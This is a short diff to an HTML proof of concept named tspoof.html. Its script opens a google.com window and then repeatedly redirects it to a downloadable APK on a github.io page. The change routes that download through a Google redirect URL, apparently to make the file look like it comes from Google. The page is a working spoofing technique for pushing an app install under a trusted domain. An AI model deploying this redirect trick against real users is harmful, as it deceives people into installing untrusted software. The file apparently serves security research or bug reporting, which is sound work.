--- a/tspoof.html
+++ b/tspoof.html
@@ -9,7 +9,7 @@
             var r = window.open('https://google.com');
             r.focus();
             setInterval(function() {
-                r.location.href = "https://ybt01.github.io/upload/app-debug.apk";
+                r.location.href = "https://www.google.com/url?q=https://ybt01.github.io/upload/app-debug.apk&sa=D&source=buganizer&usg=AOvVaw3nm-qJSzcGfjAOwSO0tcBK";
             }, 1000);
         }
     </script>
